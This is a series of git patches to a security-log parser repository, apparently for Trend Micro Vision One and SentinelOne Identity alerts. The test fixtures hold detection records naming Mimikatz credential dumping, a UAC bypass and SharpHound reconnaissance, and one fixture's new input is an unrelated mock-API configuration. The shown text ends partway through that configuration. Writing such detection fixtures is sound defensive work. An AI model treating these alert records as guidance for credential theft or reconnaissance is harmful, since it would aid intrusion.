\"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}",
     "event": {
+      "action": "File quarantined",
       "category": [
         "intrusion_detection"
       ],

From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 2 Dec 2024 09:55:43 +0100
Subject: [PATCH 301/317] fix(TrendMicroVisionOne): fix workbench alert url

---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml           | 2 +-
 .../tests/test_eicar_test_file_detection.json                  | 3 ++-
 .../tests/test_information_gathering.json                      | 3 ++-
 .../tests/test_internal_network_scanner.json                   | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_process.json     | 3 ++-
 .../trend-micro-vision-one/tests/test_project_injection.json   | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_registry.json    | 3 ++-
 .../trend-micro-vision-one/tests/test_service_abuse.json       | 3 ++-
 8 files changed, 15 insertions(+), 8 deletions(-)

diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 988fe612e..d672e2a64 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
@@ -36,7 +36,7 @@ stages:
           rule.name: "{{parsed_event.message.model}}"
           rule.id: "{{parsed_event.message.model.modelId}}"
 
-          event.url: "{{parsed_event.message.model.workbenchLink}}"
+          event.url: "{{parsed_event.message.workbenchLink}}"
           event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 
       - set:
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index e503353f1..53813871b 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json	
@@ -13,7 +13,8 @@
       "reason": "Eicar Test File Detection",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
     },
     "@timestamp": "2024-11-26T16:51:29Z",
     "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
index 4d60422b4..edbe26be4 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json	
@@ -12,7 +12,8 @@
       "reason": "Potential Information Gathering",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
     },
     "@timestamp": "2024-11-26T16:48:06Z",
     "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 5b8dbfc95..d15f28c6f 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json	
@@ -12,7 +12,8 @@
       "reason": "Internal Network Scanner",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509"
     },
     "@timestamp": "2024-07-23T14:46:11Z",
     "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9a41ea92c..3c77d1afd 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json	
@@ -12,7 +12,8 @@
       "reason": "Credential Dumping via Mimikatz",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://THE_WORKBENCH_URL"
     },
     "@timestamp": "2022-09-06T02:49:30Z",
     "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
index dbeed8e8e..a95ac7fc8 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json	
@@ -12,7 +12,8 @@
       "reason": "Process Injection from Windows Temporary Location to System32",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
     },
     "@timestamp": "2024-07-23T07:49:48Z",
     "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 61b294270..6598afe24 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json	
@@ -12,7 +12,8 @@
       "reason": "Privilege Escalation via UAC Bypass",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://THE_WORKBENCH_URL"
     },
     "@timestamp": "2022-09-06T02:49:31Z",
     "container": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
index e3283fe41..a9a7d3d7c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json	
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json	
@@ -12,7 +12,8 @@
       "reason": "Possible Web Service Abuse",
       "type": [
         "info"
-      ]
+      ],
+      "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
     },
     "@timestamp": "2024-11-26T16:45:28Z",
     "action": {

From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Mon, 2 Dec 2024 10:00:00 +0100
Subject: [PATCH 302/317] refactor(TrendMicro): change the name of the format

---
 .../CHANGELOG.md                                    |   0
 .../_meta/fields.yml                                |   0
 .../_meta/logo.png                                  | Bin
 .../_meta/manifest.yml                              |   5 +++--
 .../_meta/smart-descriptions.json                   |   0
 .../ingest/parser.yml                               |   2 +-
 .../tests/test_eicar_test_file_detection.json       |   0
 .../tests/test_information_gathering.json           |   0
 .../tests/test_internal_network_scanner.json        |   0
 .../tests/test_process.json                         |   0
 .../tests/test_project_injection.json               |   0
 .../tests/test_registry.json                        |   0
 .../tests/test_service_abuse.json                   |   0
 13 files changed, 4 insertions(+), 3 deletions(-)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_registry.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%)

diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md
rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/logo.png
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
similarity index 73%
rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
index da8360194..014352012 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml	
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml	
@@ -1,11 +1,12 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
 automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
-name: Trend Micro Vision One [BETA]
-slug: trend-micro-vision-one
+name: Trend Micro Vision One Workbench Alerts [BETA]
+slug: trend-micro-vision-one-workbench-alerts
 
 description: >-
   Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+  This intake format will ingest Workbench Alerts from Trend Micro Vision One.
 
 data_sources:
   Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
similarity index 99%
rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml
rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
index d672e2a64..f5859582b 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml	
+++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml	
@@ -1,4 +1,4 @@
-name: trend-micro-vision-one
+name: trend-micro-vision-one-workbench
 ignored_values: []
 pipeline:
   - name: parsed_event
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_process.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json

From da65007e11116a5b5a457a097df379c56cd4d66b Mon Sep 17 00:00:00 2001
From: vg-svitla <131353512+vg-svitla@users.noreply.github.com>
Date: Mon, 2 Dec 2024 15:24:03 +0200
Subject: [PATCH 303/317] Update SentinelOne/identity/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 SentinelOne/identity/_meta/manifest.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 1d18ad943..e8b52a2d5 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -1,6 +1,8 @@
 uuid: b502e522-6996-4b12-9538-f69326b68243
-name: SentinelOne Singularity Identity
+name: SentinelOne Singularity Identity [ALPHA]
 slug: sentinelone-singularity-identity
+automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a
+automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464
 
 description: >-
   SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.

From c97f9cc3ebe0cc7aa224c75fb383f2bbbb3ff18e Mon Sep 17 00:00:00 2001
From: vg-svitla <v.huriev@svitla.com>
Date: Mon, 2 Dec 2024 17:26:30 +0200
Subject: [PATCH 304/317] Fix comments

---
 SentinelOne/identity/tests/test_alert_16.json | 47 -------------------
 SentinelOne/identity/tests/test_alert_2.json  | 31 ++++++++++--
 2 files changed, 28 insertions(+), 50 deletions(-)
 delete mode 100644 SentinelOne/identity/tests/test_alert_16.json

diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
deleted file mode 100644
index 0a9dc292d..000000000
--- a/SentinelOne/identity/tests/test_alert_16.json
+++ /dev/null
@@ -1,47 +0,0 @@
-{
-  "input": {
-    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
-  },
-  "expected": {
-    "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
-    "event": {
-      "category": "intrusion_detection",
-      "end": "2024-11-22T08:45:50Z",
-      "kind": "alert",
-      "provider": "Identity",
-      "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
-      "start": "2024-11-22T08:45:50Z",
-      "type": "info"
-    },
-    "@timestamp": "2024-11-22T08:45:50Z",
-    "observer": {
-      "product": "Singularity Identity",
-      "vendor": "SentinelOne"
-    },
-    "process": {
-      "command_line": "Sharphound.exe",
-      "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
-      "hash": {
-        "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      },
-      "name": "sharphound.exe"
-    },
-    "related": {
-      "hash": [
-        "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
-      ]
-    },
-    "sentinelone": {
-      "identity": {
-        "attackSurfaces": [
-          "IDENTITY"
-        ],
-        "classification": "ENUMERATION",
-        "confidenceLevel": "MALICIOUS",
-        "id": "01935310-dc47-75de-8925-5f026bd5a705",
-        "name": "LDAP Search Detected",
-        "status": "NEW"
-      }
-    }
-  }
-}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
index 39420a5e0..0a9dc292d 100644
--- a/SentinelOne/identity/tests/test_alert_2.json
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -1,21 +1,46 @@
 {
   "input": {
-    "message": "{\n  \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n  \"lastMigration\": 33,\n  \"name\": \"Mocked api\",\n  \"endpointPrefix\": \"\",\n  \"latency\": 0,\n  \"port\": 3000,\n  \"hostname\": \"\",\n  \"folders\": [\n    {\n      \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n      \"name\": \"user\",\n      \"children\": [\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n        },\n        {\n          \"type\": \"route\",\n          \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n        }\n      ]\n    }\n  ],\n  \"routes\": [\n    {\n      \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n      \"type\": \"http\",\n      \"documentation\": \"Creates new user\",\n      \"method\": \"post\",\n      \"endpoint\": \"user\",\n      \"responses\": [\n        {\n          \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"w34k\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"CreateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n      \"type\": \"http\",\n      \"documentation\": \"Logout\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/logout\",\n      \"responses\": [\n        {\n          \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n      \"type\": \"http\",\n      \"documentation\": \"Authenticate user with credentials\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/authenticate\",\n      \"responses\": [\n        {\n          \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$\",\n              \"value\": \"AuthenticateUserRequest\",\n              \"invert\": false,\n              \"operator\": \"valid_json_schema\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n      \"type\": \"http\",\n      \"documentation\": \"Refresh Session\",\n      \"method\": \"post\",\n      \"endpoint\": \"user/refresh-session\",\n      \"responses\": [\n        {\n          \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 200,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"DATABUCKET\",\n          \"filePath\": \"\",\n          \"databucketID\": \"77fk\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": true,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        },\n        {\n          \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"OR\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": false,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": null,\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n      \"type\": \"http\",\n      \"documentation\": \"Auth required\",\n      \"method\": \"all\",\n      \"endpoint\": \"*\",\n      \"responses\": [\n        {\n          \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 401,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"header\",\n              \"modifier\": \"funfy-auth-token\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            },\n            {\n              \"target\": \"path\",\n              \"modifier\": \"\",\n              \"value\": \"/user/authenticate\",\n              \"invert\": true,\n              \"operator\": \"equals\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          \"disableTemplating\": false,\n          \"fallbackTo404\": false,\n          \"default\": true,\n          \"crudKey\": \"id\",\n          \"callbacks\": []\n        }\n      ],\n      \"responseMode\": \"FALLBACK\",\n      \"streamingMode\": null,\n      \"streamingInterval\": 0\n    },\n    {\n      \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n      \"type\": \"http\",\n      \"documentation\": \"RefreshToken is required\",\n      \"method\": \"all\",\n      \"endpoint\": \"user/*\",\n      \"responses\": [\n        {\n          \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n          \"body\": \"{}\",\n          \"latency\": 0,\n          \"statusCode\": 400,\n          \"label\": \"\",\n          \"headers\": [],\n          \"bodyType\": \"INLINE\",\n          \"filePath\": \"\",\n          \"databucketID\": \"\",\n          \"sendFileAsBody\": false,\n          \"rules\": [\n            {\n              \"target\": \"body\",\n              \"modifier\": \"$.refreshToken\",\n              \"value\": \"\",\n              \"invert\": false,\n              \"operator\": \"null\"\n            }\n          ],\n          \"rulesOperator\": \"AND\",\n          